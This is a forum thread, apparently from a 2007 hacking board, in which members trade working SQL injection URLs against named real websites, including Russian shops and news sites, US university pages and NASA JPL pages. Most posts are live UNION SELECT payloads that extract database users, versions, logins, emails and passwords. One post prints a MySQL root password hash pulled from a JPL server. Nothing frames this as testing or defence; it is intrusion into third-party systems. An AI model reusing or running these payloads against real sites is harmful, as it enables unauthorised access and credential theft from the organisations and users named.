SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Calcutta

    Calcutta (Elder)
    naturally you won't guess it -))
    there are 9 columns after all (;
    http://www.webkoleso.ru/index.php?pageId=-1+union+select+1,2,3,4,5,6,7,8,9/*
    I'll keep looking now... Loading [|||||........]

    version() - 4.0.26
    database() - udb4037
    4.0.26:Uwww4037S@localhost

    http://www.webkoleso.ru/index.php?pageId=-1+union+select+1,2,3,concat(version(),char(58),user()),database(),6,7,8,9/*
     
    #2981 Calcutta, 29 Aug 2007
    Last edited: 29 Aug 2007
    1 person likes this.
  2. Calcutta

    Calcutta (Elder)
    http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,database(),version(),4,5,user(),7,8,9,10,11,12,13/
    I wanted to dig down to the database of e-mails and passwords, but it didn't work out. Looks like I need to keep studying and figuring things out... I guessed the standard one.. useless :-\
     
  3. Ky3bMu4

    Ky3bMu4 (Elder)
    Here are a couple of .edu sites with PR 6
    Code:
    http://www.choices.edu/resources/detail.php?id=-49%20UNION%20SELECT%201,convert(concat_ws(0x3b,version(),user(),database())using%20latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
    http://www.hum.utah.edu/display.php?&pageId=-2037%20UNION%20SELECT%201,2,3,4,5,6,7,concat(version(),user()),9,10,11/* 
    
     
    3 people like this.
  4. Joker-jar

    Joker-jar (Elder)
    you can also do it this way
     
    2 people like this.
  5. groundhog

    groundhog (Elder)
    http://www.sitronics.ru/
     
  6. Y.Dmitriy

    Y.Dmitriy (Banned)
    online store
     
    #2986 Y.Dmitriy, 29 Aug 2007
    Last edited: 29 Aug 2007
  7. groundhog

    groundhog (Elder)
    http://vitesse.ru/
     
    1 person likes this.
  8. _GaLs_

    _GaLs_ (Elder)
    Code:
    http://www.jobpages.ru/findrezum.php?a=2&id_rezum=-705+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,mail,15,16,id_resum,18+from+resum+where+id_resum=705/*
    http://www.hardvision.ru/?dir=download&id=2970+union+select+1,2,3,4,5/*
    http://1cent.ru/Shops/search_good.php?limit=1&search_descript=yeah%27union+select+1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),3,4/*&search_brand=&search_model=&Submit=%C8%F1%EA%E0%F2%FC
    http://www.t-turn.com/article.php?sid=-9999999+union+select+1,2,3,user(),5,6,7,8,9+from+authors/*
    http://www.ruclimat.ru/sts/view.php?id=0+union+select+1,2,3,4,concat(database(),0x20,user(),0x20,version()),6,7,8,9/*
     
  9. n3m0

    n3m0 (Elder)
    http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,2,3,4,5,6,user(),8,9,10,11,12,13/*
    Substitute database() there in place of user()
    It worked for me
     
    1 person likes this.
  10. l-l00K

    l-l00K (Banned)
    amp.ru
    Code:
    http://www.amp.ru/index.php?page=6+UNION+SELECT+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+FROM+INFORMATION_SCHEMA.TABLES+--+
     
    1 person likes this.
  11. Серенький

    sql

    the table names are fairly trivial
    there is no direct output
     
  12. bulbazaur

    bulbazaur (Banned)
    sort of my first SQL injection))
    HTML:
    http://www.utdallas.edu/calendar/event.php?id=-1175532750+union+select+1,concat(user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13/*
     
    #2992 bulbazaur, 30 Aug 2007
    Last edited: 30 Aug 2007
    2 people like this.
  13. Scipio

    Scipio (Well-Known Member)
    doesn't seem to be a repost; while searching on Antichat I found something similar, but I decided to cover the topic anyway, and besides, the injection is in a different script:
    Code:
    http://www-robotics.jpl.nasa.gov/news/newsStory.cfm?NewsID=-69%20union%20select%201,2,3,4,5,6,7,8,9,aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x71),0x71),11,12,13,14,15%20from%20mysql.user/*
    root:*1CB7A709BB1423D94D5F2C14E2E929F17BEBF122
     
  14. Calcutta

    Calcutta (Elder)
    http://www.elephant.ru/index.php?item=3891+union+select+version(),2,database(),user(),5,6,7,8,9,10,11,12,13,14,15,16/*

    elephantru@localhost
    elephantru
    4.1.22-standard-log
    couldn't dig any further :-/
     
  15. l-l00K

    l-l00K (Banned)
    SPORTclub
    Code:
    http://www.sportclub.ru/news.php?id=-46+UNION+SELECT+1,2,3,concat(login,char(58),password),concat(user(),char(58),version(),char(58),database()),6,7,8,9+from+users+--+
    After I went to the forum, my interest in the site disappeared...
     
    1 person likes this.
  16. iRedX

    iRedX (Elder)
    motofan.ru

    http://top.motofan.ru/index.php?act=faq

    paste into the search field: '/**/and/**/1=2/**/union/**/select/**/version(),database(),user()/*
     
    1 person likes this.
  17. Dr.Frank

    Dr.Frank (Elder)
    irkutsk.rfn.ru
    http://irkutsk.rfn.ru/rnews.html?id=23639+order+by+11--&cid=7

    Couldn't get further... UNION doesn't work =(
     
  18. t00th

    t00th (Banned)
    http://www.elephant.ru/index.php?item=3891+union+select+1,2,concat(name,0x3a,login,),4,5,6,7,8,9,10,11,12,13,14,15,16+from+users/*
     
  19. sasTO

    sasTO (Banned)
    news agency :)
    MySQL 4
    code:
    http://www.context-ua.com/km/forum1 .php?act=forum add&botn=456&top=-4' +union+ select+ 1 ,2 ,con cat(lo gin,pas s),4 ,5 ,6 +from+users/*

    couldn't get further :(
     
  20. fly

    fly (Member)
    http://soc.jpl.nasa.gov/experience/gallery-story.cfm?id=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,char(47)%2bchar(47)%2bchar(45)%2bchar(45)%2bchar(62)%2bchar(60)%2bchar(98)%2bchar(114)%2bchar(62)%2bchar(60)%2bchar(47)%2bchar(101)%2bchar(109)%2bchar(62)%2bemail%2bchar(58)%2bpassword%2bchar(60)%2bchar(33)%2bchar(45)%2bchar(45),11,null,13,14,15,char(16),char(17),null,19,20%20from%20usersmember--s
     
    1 person likes this.